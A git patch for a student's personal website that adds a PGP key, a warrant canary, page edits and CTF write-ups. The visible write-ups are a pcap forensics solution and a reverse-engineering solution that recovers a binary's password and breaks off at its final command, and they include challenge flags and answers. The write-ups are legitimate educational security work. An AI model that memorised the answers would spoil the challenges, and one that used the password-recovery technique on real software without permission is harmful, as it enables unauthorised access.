From 87151ea91f066992435bc1eab5fa369d8ad4f50a Mon Sep 17 00:00:00 2001
From: xamidev <xamidev@riseup.net>
Date: Mon, 29 Dec 2025 11:01:12 +0100
Subject: [PATCH] V1 with content

---
 README.md                                   |   5 +
 canary.txt                                  |  68 ++++++
 index.html                                  |  65 ++++--
 pgp.txt                                     |  41 ++++
 style.css                                   |  35 ++++
 writeups/2024-05-04-NeedleInTheWiFiStack.md |  99 +++++++++
 writeups/2025-05-27-Cbizarre.md             | 153 ++++++++++++++
 writeups/2025-05-30-Dromedary.md            | 179 ++++++++++++++++
 writeups/2025-06-02-FakeNews.md             |  46 +++++
 writeups/2025-06-05-GorfouEnDanger1.md      | 206 +++++++++++++++++++
 writeups/2025-06-10-MPC.md                  | 157 ++++++++++++++
 writeups/2025-06-12-USB51.md                |  73 +++++++
 writeups/2025-07-20-Corporate-cliche.md     | 216 ++++++++++++++++++++
 writeups/2025-07-20-Zeus.md                 | 137 +++++++++++++
 writeups/2025-08-11-old-memes.md            | 138 +++++++++++++
 writeups/2025-08-18-pie-time.md             |  86 ++++++++
 writeups/2025-08-19-pie-time-2.md           | 168 +++++++++++++++
 writeups/2025-08-24-fmt1.md                 |  99 +++++++++
 writeups/2025-08-24-fmt2.md                 | 125 +++++++++++
 writeups/2025-08-26-bo3.md                  | 187 +++++++++++++++++
 writeups/2025-08-27-fmt3.md                 | 183 +++++++++++++++++
 21 files changed, 2451 insertions(+), 15 deletions(-)
 create mode 100644 README.md
 create mode 100644 canary.txt
 create mode 100644 pgp.txt
 create mode 100644 writeups/2024-05-04-NeedleInTheWiFiStack.md
 create mode 100644 writeups/2025-05-27-Cbizarre.md
 create mode 100644 writeups/2025-05-30-Dromedary.md
 create mode 100644 writeups/2025-06-02-FakeNews.md
 create mode 100644 writeups/2025-06-05-GorfouEnDanger1.md
 create mode 100644 writeups/2025-06-10-MPC.md
 create mode 100644 writeups/2025-06-12-USB51.md
 create mode 100644 writeups/2025-07-20-Corporate-cliche.md
 create mode 100644 writeups/2025-07-20-Zeus.md
 create mode 100644 writeups/2025-08-11-old-memes.md
 create mode 100644 writeups/2025-08-18-pie-time.md
 create mode 100644 writeups/2025-08-19-pie-time-2.md
 create mode 100644 writeups/2025-08-24-fmt1.md
 create mode 100644 writeups/2025-08-24-fmt2.md
 create mode 100644 writeups/2025-08-26-bo3.md
 create mode 100644 writeups/2025-08-27-fmt3.md

diff --git a/README.md b/README.md
new file mode 100644
index 0000000..64becdc
--- /dev/null
+++ b/README.md
@@ -0,0 +1,5 @@
+## TODO
+
+- Responsiveness
+- Populate with some nice content: About section, ideas, free software propaganda
+- A few more "cool looking" features?
\ No newline at end of file
diff --git a/canary.txt b/canary.txt
new file mode 100644
index 0000000..bff455d
--- /dev/null
+++ b/canary.txt
@@ -0,0 +1,68 @@
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA512
+
+github.com/xamidev <xamidev@riseup.net>
+
+I am alive, free, and in control of my PGP key as of 26th of December, 2025.
+This note will be renewed in less than 90 days.
+
+Latest Monero block hash:
+aa88425694c0a194fb4568c659c99eb21ecdee32376210aadfbb44d1229d55e3
+-----BEGIN PGP SIGNATURE-----
+
+iQGzBAEBCgAdFiEErDL26y2hVQrO397oLW3bfhIptHsFAmlOZY8ACgkQLW3bfhIp
+tHsC8wv/ee9OnuUokOCPw+NlIGlJd2D27Fh2NNjxObcmiAdxwBjqC+jmh8RW17Hr
++RlJqWtc0o35FNTs8tVYH+MShsB1KiFwbnXL7Pfqo3k0OTafBN25KhAi6rTQWr1C
+LwwIqgyVc0SO8cVIyhPD1oIX2HJbQnMsZiJzE3BsFElKCJryohYpv+CgFI6sfMkg
+0qv2gsMHXlA92GNv+sjJTUFpYUDen/wdD9+cr+SPThafmS3r+p8YEMettaHsN91d
+OZ0V8wHtbWsz3YQmRC1eXLaMtFozr4MuRzE6l3EBtMYAvzGXyVabn/BWnotY8o89
+4QVLdN7d16/a4Ry8KkPz7OBaVMjpl+b91g3TXLsejuKEsMW5ya1gw2kpD7sIQYHj
+0EgufcMvCyzSyZTsCFY9ttV6OoCqGblhNUBCqoaBdQAfoMnnhdD5HE0JXdCJkXoV
+ZRhTjpkugcRrI1zcpj1UyA1c/kaaKKsxxzN0wP2aisBKWGt1FrCj4zlb6rzgEZSg
+NDBi7uHC
+=uCyy
+-----END PGP SIGNATURE-----
+            
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+
+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
+7r/MO+w1Y//onBy7KHr5k9gtjcQ=
+=ZRh2
+-----END PGP PUBLIC KEY BLOCK-----
+            
\ No newline at end of file
diff --git a/index.html b/index.html
index 44d15cb..3a396fe 100644
--- a/index.html
+++ b/index.html
@@ -1,9 +1,10 @@
 <!DOCTYPE html>
-<html>
+<html lang="en">
 
 <head>
   <meta charset="utf-8">
   <link rel="stylesheet" href="style.css">
+  <title>the libre garbage stash</title>
 </head>
 
 <body>
@@ -25,8 +26,11 @@
             <h2>Welcome to my garbage stash!</h2>
             <span class="icon">⚡</span>
           </div>
-          <img style="margin-top:10px" src="me.png" width="100" height="100">
-          <p>free software advocate; privacy and cybersecurity enthusiast; low-level development enjoyer.</p>
+          <div class="profile">
+            <img src="me.png" width="100" height="100">
+            <p>Hello! I am a free software advocate, privacy and cybersecurity enthusiast, and low-level development enjoyer.<br>
+            This is the place where I share some things I did around computers.</p>
+          </div>
         </div>
 
         <div class="box" id="cool-stuff">
@@ -34,14 +38,15 @@
             <h2>some of my projects...</h2>
             <span class="icon">🚧</span>
           </div>
-          <p>
-            Nunc ornare convallis nibh. Aliquam id mi tincidunt, gravida elit vitae, vehicula neque. Nullam at eleifend
-            risus, ac placerat arcu. Morbi faucibus et sem eget ultrices. Mauris scelerisque bibendum arcu, non accumsan
-            odio semper nec. Sed convallis suscipit tortor, vitae rhoncus massa dapibus volutpat. Sed arcu massa,
-            tristique nec lorem eu, eleifend pharetra metus. Donec pellentesque augue lacus, fermentum volutpat diam
-            laoreet vitae. Duis at rhoncus neque. Etiam lobortis ac dui sed elementum. Mauris egestas aliquam tellus,
-            sed feugiat neque consectetur eu.
-          </p>
+          <ul>
+            <li><a href="https://git.furtest.fr/xamidev/blankos" target="_blank">blankOS</a>: ring-zero operating system for 32-bit x86</li>
+            <li><a href="https://git.furtest.fr/xamidev/helpelf" target="_blank">helpelf</a>: ELF parser and recon tool for binary exploitation</li>
+            <li><a href="https://git.furtest.fr/xamidev/webserver" target="_blank">webserver</a>: an assembly HTTP GET/POST concurrent server for x86_64</li>
+            <li><a href="https://git.furtest.fr/xamidev/sandbox" target="_blank">sandbox</a>: 2D sandbox cellular automaton, with gravity, using Raylib</li>
+            <li><a href="https://git.furtest.fr/xamidev/dumb8" target="_blank">dumb8</a>: 8-bit RISC processing unit and assembly language</li>
+            <li><a href="https://git.furtest.fr/xamidev/igcp" target="_blank">igcp</a>: IGC flight data parser & 3D viewer</li>
+            <li><a href="https://git.furtest.fr/xamidev/uhex" target="_blank">uhex</a>: minimalist hex editor</li>
+          </ul>
         </div>
 
         <div class="box" id="cool-stuff">
@@ -49,7 +54,28 @@
             <h2>CTF content...</h2>
             <span class="icon">🏴‍☠️</span>
           </div>
-          <p>Blah blah blah I'm a hacker!</p>
+          <div style="text-align: center;">
+            <h3 style="text-align: center;">- pwn -</h3>
+            <span>
+              <a href="writeups/2025-06-05-GorfouEnDanger1.md">Gorfou En Danger 1</a> ✩ <a href="writeups/2025-08-18-pie-time.md">PIE TIME</a> ✩ <a href="writeups/2025-08-24-fmt1.md">format-string-1</a> ✩ <a href="writeups/2025-08-26-bo3.md">buffer-overflow-3</a> ✩ <a href="writeups/2025-06-02-FakeNews.md">Fake News</a> ✩ <a href="writeups/2025-06-10-MPC.md">MPC</a> ✩ <a href="writeups/2025-07-20-Corporate-cliche.md">Corporate cliché</a> ✩ <a href="writeups/2025-08-11-old-memes.md">old-memes</a> ✩ <a href="writeups/2025-08-19-pie-time-2.md">PIE TIME 2</a> ✩ <a href="writeups/2025-08-24-fmt2.md">format-string-2</a> ✩ <a href="writeups/2025-08-27-fmt3.md">format-string-3</a>
+            </span>
+            <h3 style="text-align: center;">- rev -</h3>
+            <span>
+              <a href="writeups/2025-05-30-Dromedary.md">Dromedary</a> ✩ <a href="writeups/2025-07-20-Zeus.md">Zeus</a> ✩ <a href="writeups/2025-05-27-Cbizarre.md">Cbizarre</a>
+            </span>
+            <h3 style="text-align: center;">- forensics -</h3>
+            <a href="writeups/2024-05-04-NeedleInTheWiFiStack.md">Needle in the Wi-Fi stack</a> ✩ <a href="writeups/2025-06-12-USB51.md">USB51</a>
+          </div>
+        </div>
+
+        <div class="box" id="cool-stuff">
+          <div class="header-with-icon">
+            <h2>free (as in freedom)...</h2>
+            <span class="icon">🌎</span>
+          </div>
+          
+          <p>All my works are licensed under the GNU GPL v3 unless otherwise specified.</p>
+          <p>Here are a couple of reasons why you shouldn't trust <a href="https://www.gnu.org/proprietary/" target="_blank">proprietary</a> software.</p>
         </div>
 
       </div>
@@ -63,9 +89,11 @@
         </div>
         
         <ul>
-          <li>ligma</li>
-          <li>ballz</li>
-          <li>china</li>
+          <li><a href="pgp.txt" target="_blank">PGP key</a></li>
+          <li><a href="canary.txt" target="_blank">Canary</a></li>
+          <li><a href="mailto:xamidev@riseup.net">Mail</a></li>
+          <li><a href="https://github.com/xamidev" target="_blank">GitHub</a></li>
+          <li><a href="https://git.furtest.fr/xamidev" target="_blank">Furtest's Git</a></li>
         </ul>
         
         <div class="header-with-icon">
@@ -84,8 +112,15 @@
           <li>Rammstein</li>
           <li>RHCP</li>
           <li>RATM</li>
+          <li>Korol i Shut</li>
           <li>and many others</li>
         </ul>
+
+        <div class="header-with-icon">
+          <h2>About</h2>
+          <span class="icon">😄</span>
+        </div>
+        <p>I'm a passionate engineering/CS student, with a love for playing music, especially bass.</p>
         
       </div>
     </div>
diff --git a/pgp.txt b/pgp.txt
new file mode 100644
index 0000000..a3cf9b7
--- /dev/null
+++ b/pgp.txt
@@ -0,0 +1,41 @@
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+
+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
+7r/MO+w1Y//onBy7KHr5k9gtjcQ=
+=ZRh2
+-----END PGP PUBLIC KEY BLOCK-----
diff --git a/style.css b/style.css
index 9711683..9342640 100644
--- a/style.css
+++ b/style.css
@@ -49,6 +49,29 @@ p, li {
   box-sizing: border-box;
 }
 
+#cool-stuff a {
+  font-size:larger;
+  color:#df2929;
+}
+
+#cool-stuff a:hover {
+  color:#ff5e5e;
+}
+
+#cool-stuff li {
+  margin-top: 5px;
+  margin-bottom: 5px;
+  font-size: larger;
+}
+
+#sideBar a {
+  color:grey;
+}
+
+#sideBar a:hover {
+  color:#b4b4b4;
+}
+
 #all {
   padding:2% 20%;
 }
@@ -113,3 +136,15 @@ p, li {
   cursor: pointer;
   font-size: 1.2em;
 }
+
+.profile {
+  display: flex;
+  align-items: flex-start;
+  gap: 12px;              
+  margin-top: 10px;
+}
+
+.profile p {
+  margin: 0;
+  line-height: 1.4;
+}
diff --git a/writeups/2024-05-04-NeedleInTheWiFiStack.md b/writeups/2024-05-04-NeedleInTheWiFiStack.md
new file mode 100644
index 0000000..f3da6bc
--- /dev/null
+++ b/writeups/2024-05-04-NeedleInTheWiFiStack.md
@@ -0,0 +1,99 @@
+---
+title: "Buckeye CTF 2023: Needle in the Wi-Fi stack"
+excerpt: "Someone listened on the network and now our task is to exfiltrate some useful data from there."
+tags: [ctf, forensics] 
+---
+
+Someone listened on the network and now our task is to exfiltrate some useful data from there.
+
+## Recon 
+
+We are provided with a `.pcap` file, which is a packet capture file, that we can open using Wireshark. At first glance, it looks like the information we need is hidden on the right: all the SSIDs are encoded. The encoding format seems to be base64, as most of the strings have one or two equal symbols at the end, and use an alphanumeric charset. We could verify this using online encoding checkers, but we can also use the Linux base64 tool as well for that. Assuming we saved one of those strings in a file, we can do:
+
+```bash
+$ base64 -d weird_string
+wh3n in doub7, hack hard3r
+```
+
+Scrolling to the end of the .pcap file, we see that there are over one thousand lines to be analyzed.. We clearly can't proceed manually with this amount of information. Unfortunately, we cannot read the packet capture file as-is and grep what we want, as it looks like gibberish.
+
+We could use the command-line utility `tshark` to read the file from the terminal, but all of the packet information we do not need is still present:
+
+```bash
+$ tshark -r frames.pcap
+    1   0.000000 22:22:22:22:22:22 -> Broadcast   802.11 120 Beacon frame, SN=0, FN=0, Flags=........, BI=100, 
+SSID="bG9vMDBvMDBvbzBvMG9vb3Q3YSB0cjRmZmJjIHRvZDR5Cg=="
+    2   0.029637 22:22:22:22:22:22 -> Broadcast   802.11 140 Beacon frame, SN=0, FN=0, Flags=........, BI=100, 
+SSID="N2hpcypBcyBub3QgdG5LN3dvcm5gbmFtMyB5b3UgYXJlIGwwb2tpbmcbZjByCg=="
+    3   0.041307 22:22:22:22:22:22 -> Broadcast   802.11 100 Beacon frame, SN=0, FN=0, Flags=........, BI=100, 
+SSID="d2lmaSBpNSBteSBtVT1aW9uCg=="
+    4   0.052245 22:22:22:22:22:22 -> Broadcast   802.11 100 Beacon frame, SN=0, FN=0, Flags=........, BI=100, 
+SSID="d2lmaSBpNSBteSBtVT1aW9uCg=="
+```
+
+## Extracting data
+
+By reading the `tshark` help mage and manual page, we can see that there are options for extracting certain packet fields. We only want the SSIDs, so we will use these options:
+
+```bash
+$ tshark -r frames.pcap -T fields -e wlan.ssid > ssids.txt
+```
+
+That command tells `tshark` to read the `frames.pcap` file, to extract data as fields, and only print the WLAN SSID field. The output will be stored in the ssids.txt file. Running this, we obtain a file containing hexadecimal values. We will have to convert this output to ASCII in order to read it properly.
+
+```bash
+$ cat ssids.txt
+b7437976644472664472666a74764d43797662353135953423063a52d65a6d6c6a494852765a44523543673d3d
+4e3268706379472759532351676476777a9473564e236476636d37626d6479447942356233556759584a6c494777776232747
+0626d63675a6a427943673d3d
+64326c6d615342704c53427655342775954567a6153797543673d3d
+64326c6d615342704c5342765534553161537937543673d3d
+19597738736516f3d
+```
+
+We can pipe a single line of hex through `xxd` to convert it to ASCII:
+
+```bash
+$ echo 626a42304947677a636a4d4b | xxd -r -p
+bjB0IGgzcjMK
+```
+
+That looks like some of the base64 we found earlier. Let's pipe our command output through the base64 tool:
+
+```bash
+$ echo 626a42304947677a636a4d4b | xxd -r -p | base64 -d
+n0t h3r3
+```
+
+This is what we wanted. Now, let's automate this process for the huge amount of lines we have, by making a small Bash script:
+
+```bash
+while read p; do
+    echo $p | xxd -r -p | base64 -d >> clearssids.txt
+done <ssids.txt
+```
+
+This will start a while loop, and read the `ssids.txt` file we created earlier. Each line of the file will get converted in base64, then into human-readable text, and then it will be written in a new file called `clearssids.txt`. This file will contain all the SSIDs in cleartext. After executing the script, we get this:
+
+```bash
+$ ./extract.sh
+$ cat clearssids.txt
+wh3n in doubt, hack harder
+4ll the c001 kid5 4r3 pl4yin6 wi7h 802.11
+beacon fram3s, s0 ho7 ri6h7 n0w
+ke3p 534rchin6
+wifi is my p4ssi0n
+[REDACTED FOR SIMPLICITY]
+```
+
+The flag could be hidden in all this mess. We can find the flag by grepping the specific CTF flag format prefix which is `bctf{` here:
+
+```bash
+$ cat clearssids.txt | grep bctf{
+bctf{tw0_po1nt_4_g33_c0ng3s7ion}
+bctf{tw0_po1nt_4_g33_c0ng3s7ion}
+bctf{tw0_po1nt_4_g33_c0ng3s7ion}
+[REDACTED FOR SIMPLICITY]
+```
+
+There we go!
diff --git a/writeups/2025-05-27-Cbizarre.md b/writeups/2025-05-27-Cbizarre.md
new file mode 100644
index 0000000..603faf4
--- /dev/null
+++ b/writeups/2025-05-27-Cbizarre.md
@@ -0,0 +1,153 @@
+---
+title: "404CTF 2025: Cbizarre"
+excerpt: "In this reverse engineering challenge, we will extract a password from a binary file."
+tags: [ctf, rev] 
+---
+
+## Recon
+
+We're provided with a binary file. Checking the usual stuff:
+
+```
+$ file chall2 
+chall2: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=683fe4c494b6b7dc5df519f9299a42f6616677ff, for GNU/Linux 3.2.0, not stripped
+```
+
+```
+$ checksec --file=chall2           
+RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable     FILE
+Partial RELRO   No canary found   NX enabled    PIE enabled     No RPATH   No RUNPATH   43 Symbols        No    0               2               chall2
+```
+
+Some protections are enabled as we can see (NX, PIE). We can proceed to decompile the binary using Ghidra, and after some stripping of the useless/usual lines, and after renaming some labels, we find the interesting part of the code:
+
+```c
+  if (argc == 2) {
+    length = strlen((char *)argv[1]);
+    if (length == 0x14) {
+      if (*(char *)(argv[1] + 5) != 'Z') {
+        fwrite("Error: Incorrect password.\n",1,0x1b,stderr);
+        exit(1);
+      }
+      if (*(char *)(argv[1] + 0xc) != 'o') {
+        fwrite("Error: Incorrect password.\n",1,0x1b,stderr);
+        exit(1);
+      }
+      if (*(char *)argv[1] != 'f') {
+        fwrite("Error: Incorrect password.\n",1,0x1b,stderr);
+        exit(1);
+      }
+      if (*(char *)(argv[1] + 0x12) != '1') {
+        fwrite("Error: Incorrect password.\n",1,0x1b,stderr);
+        exit(1);
+      }
+      if (*(char *)(argv[1] + 7) != '%') {
+        fwrite("Error: Incorrect password.\n",1,0x1b,stderr);
+        exit(1);
+      }
+      if (*(char *)(argv[1] + 3) != 'M') {
+        fwrite("Error: Incorrect password.\n",1,0x1b,stderr);
+        exit(1);
+      }
+      if (*(char *)(argv[1] + 9) != 'y') {
+        fwrite("Error: Incorrect password.\n",1,0x1b,stderr);
+        exit(1);
+      }
+      if (*(char *)(argv[1] + 0x10) != 'v') {
+        fwrite("Error: Incorrect password.\n",1,0x1b,stderr);
+        exit(1);
+      }
+      if (*(char *)(argv[1] + 0xe) != 'n') {
+        fwrite("Error: Incorrect password.\n",1,0x1b,stderr);
+        exit(1);
+      }
+      if (*(char *)(argv[1] + 1) != 'a') {
+        fwrite("Error: Incorrect password.\n",1,0x1b,stderr);
+        exit(1);
+      }
+      if (*(char *)(argv[1] + 0x13) != 'x') {
+        fwrite("Error: Incorrect password.\n",1,0x1b,stderr);
+        exit(1);
+      }
+      if (*(char *)(argv[1] + 6) != 'a') {
+        fwrite("Error: Incorrect password.\n",1,0x1b,stderr);
+        exit(1);
+      }
+      if (*(char *)(argv[1] + 0xf) != 'M') {
+        fwrite("Error: Incorrect password.\n",1,0x1b,stderr);
+        exit(1);
+      }
+      if (*(char *)(argv[1] + 8) != '3') {
+        fwrite("Error: Incorrect password.\n",1,0x1b,stderr);
+        exit(1);
+      }
+      if (*(char *)(argv[1] + 4) != 'P') {
+        fwrite("Error: Incorrect password.\n",1,0x1b,stderr);
+        exit(1);
+      }
+      if (*(char *)(argv[1] + 0xb) != 'K') {
+        fwrite("Error: Incorrect password.\n",1,0x1b,stderr);
+        exit(1);
+      }
+      if (*(char *)(argv[1] + 10) != 'N') {
+        fwrite("Error: Incorrect password.\n",1,0x1b,stderr);
+        exit(1);
+      }
+      if (*(char *)(argv[1] + 0x11) != '%') {
+        fwrite("Error: Incorrect password.\n",1,0x1b,stderr);
+        exit(1);
+      }
+      if (*(char *)(argv[1] + 2) != 'V') {
+        fwrite("Error: Incorrect password.\n",1,0x1b,stderr);
+        exit(1);
+      }
+      if (*(char *)(argv[1] + 0xd) != '@') {
+        fwrite("Error: Incorrect password.\n",1,0x1b,stderr);
+        exit(1);
+      }
+      local_28 = 0x661a1c040e625152;
+      local_20 = 0x492f7e4954;
+      uStack_1b = 0x200233;
+      uStack_18 = 0x5026906;
+      local_10 = xor(&local_28,argv[1],0x14);
+      printf("Bravo ! Vous avez le flag ! %s\n",local_10);
+      result = 0;
+    }
+    else {
+      fwrite("Error: Incorrect password.\n",1,0x1b,stderr);
+      result = 1;
+    }
+  }
+  else {
+    fprintf(stderr,"Usage: %s <password>\n",*argv);
+    result = 1;
+  }
+  return result;
+}
+```
+
+As we can see here, we need to provide a password as a command-line argument to the binary. The first information we gather about that password is that its length is 0x14 bytes (which is 20 in decimal).
+Then, we see that the program compares some position in memory, with an offset relative to the start of the password string, against a byte: in the below example, the program compares the byte offseted by 5 against 'Z':
+```c
+if (*(char *)(argv[1] + 5) != 'Z') {
+        fwrite("Error: Incorrect password.\n",1,0x1b,stderr);
+        exit(1);
+      }
+```
+That code part can simply be resumed with this pseudocode:
+```
+if (password+5 != 'Z') then exit
+```
+
+## Data recovery and exploitation
+
+Looking at all those small conditional statements, it looks like the password can be retrieved by looking at each comparison and assembling all the letters that are compared, in the right order.
+
+After getting through all of the checks manually and writing down the byte at the correct offset, we're left with this string: `faVMPZa%3yNKo@nMv%1x`.
+
+Throwing it as input to the program gives us the flag:
+
+```
+$ ./chall2 faVMPZa%3yNKo@nMv%1x
